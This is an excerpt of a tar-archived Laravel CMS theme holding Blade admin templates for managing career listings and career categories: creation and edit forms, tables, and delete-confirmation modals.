}}</label> <textarea id="summernote" name="description" class="form-control"></textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control"></textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.use_special_breadcrumb') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes">{{ __('content.yes') }}</option> <option value="no">{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input id="section_image" name="section_image" type="file" class="form-control-file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary col-12">{{ __('content.submit') }}</button> </div> </div> </div> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/career/category/create.blade.php��������������������������������������������������������0000644�����������������00000027240�14765366572�0015123 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.categories') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#categoryModal">+ {{ __('content.add_category') }}</button> </div> </div> @if (count($categories) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('career-category.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($categories); $asc=0; @endphp @foreach ($categories as $category) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $category->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $category->category_name }}</td> <td>{{ $category->order }}</td> <td> @if($category->status == 0) <span class="badge badge-danger">{{ __('content.disable') }}</span> @else <span class="badge badge-success">{{ __('content.enable') }}</span> @endif </td> <td> <div> <a href="{{ route('career-category.edit', $category->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $category->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $category->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('career-category.destroy', $category->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="categoryModal" tabindex="-1" role="dialog" aria-labelledby="categoryModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="categoryModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career-category.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/career/category/edit.blade.php����������������������������������������������������������0000644�����������������00000006443�14765366572�0014607 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_category') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career-category.update', $category->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" value="{{ $category->category_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $category->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $category->status == 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $category->status == 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/career/index.blade.php������������������������������������������������������������������0000644�����������������00000111023�14765366572�0013143 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title mb-0">{{ __('content.careers') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('career.index', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/career-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#careerSectionModal">{{ __('content.section_title_and_description') }}</button> <a href="{{ url('admin/career/create/'.$style) }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_career') }}</a> </div> </div> @if (count($careers) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('career.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.additional_features') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($careers); $asc=0; @endphp @foreach ($careers as $career) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $career->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> <div class="btn-group"> <button type="button" class="btn btn-primary dropdown-toggle" data-toggle="dropdown" aria-expanded="false">{{ __('content.select') }}</button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('career-content.create', $career->id) }}">{{ __('content.career_content') }}</a> </div> </div> </td> <td>{{ $career->title }}</td> <td>{{ $career->category_name }}</td> <td>{{ $career->order }}</td> <td> <div> <a href="{{ route('career.edit', $career->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $career->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $career->id }}" tabindex="-1" role="dialog" aria-labelledby="counterModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('career.destroy', $career->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="careerSectionModal" tabindex="-1" role="dialog" aria-labelledby="careerSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="careerSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($career_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career-section.update', $career_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $career_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $career_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $career_section->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $career_section->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="company_title">{{ __('content.company_title') }}</label> <input type="text" name="company_title" class="form-control" id="company_title" value="{{ $career_section->company_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'company_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'company_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'company_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'company_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'company_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'company_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="company_description">{{ __('content.company_description') }}</label> <textarea name="company_description" class="form-control" id="company_description" rows="3">{{ $career_section->company_description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'company_description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'company_description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'company_description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'company_description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'company_description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'company_description')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="company_contact_title">{{ __('content.company_contact_title') }}</label> <input type="text" name="company_contact_title" class="form-control" id="company_contact_title" value="{{ $career_section->company_contact_title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }}</label> <input type="text" name="email" class="form-control" id="email" value="{{ $career_section->email }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="phone">{{ __('content.phone') }}</label> <input type="text" name="phone" class="form-control" id="phone" value="{{ $career_section->phone }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="address">{{ __('content.address') }}</label> <input type="text" name="address" class="form-control" id="address" value="{{ $career_section->address }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="{{ $career_section->section_item }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="{{ $career_section->paginate_item }}"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#careerSectionDestroyModal{{ $career_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="careerSectionDestroyModal{{ $career_section->id }}" tabindex="-1" role="dialog" aria-labelledby="careerSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="careerSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('career-section.destroy', $career_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="company_title">{{ __('content.company_title') }}</label> <input type="text" name="company_title" class="form-control" id="company_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'company_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'company_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'company_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'company_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'company_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'company_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="company_description">{{ __('content.company_description') }}</label> <textarea name="company_description" class="form-control" id="company_description" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'company_description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'company_description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'company_description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'company_description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'company_description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'company_description')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="company_contact_title">{{ __('content.company_contact_title') }}</label> <input type="text" name="company_contact_title" class="form-control" id="company_contact_title"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }}</label> <input type="text" name="email" class="form-control" id="email"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="phone">{{ __('content.phone') }}</label> <input type="text" name="phone" class="form-control" id="phone"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="address">{{ __('content.address') }}</label> <input type="text" name="address" class="form-control" id="address"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="6"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="12"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/career/edit.blade.php�������������������������������������������������������������������0000644�����������������00000034275�14765366572�0012776 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_career') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.select') }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('career-content.create', $career->id) }}">{{ __('content.career_content') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/team-'.$career->style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career.update', $career->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $career->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input type="text" name="title" class="form-control" id="title" value="{{ $career->title }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach ($categories as $category) <option value="{{ $category->id}}" {{ $category->id == $career->category_id ? 'selected' : '' }}>{{ $category->category_name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="short_description">{{ __('content.short_description') }}</label> <textarea type="text" name="short_description" class="form-control" id="short_description" rows="3">{{ $career->short_description }}</textarea> </div> </div> <div class="col-md-12"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" {{ $career->type == 'icon' ? 'checked' : '' }}><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image" {{ 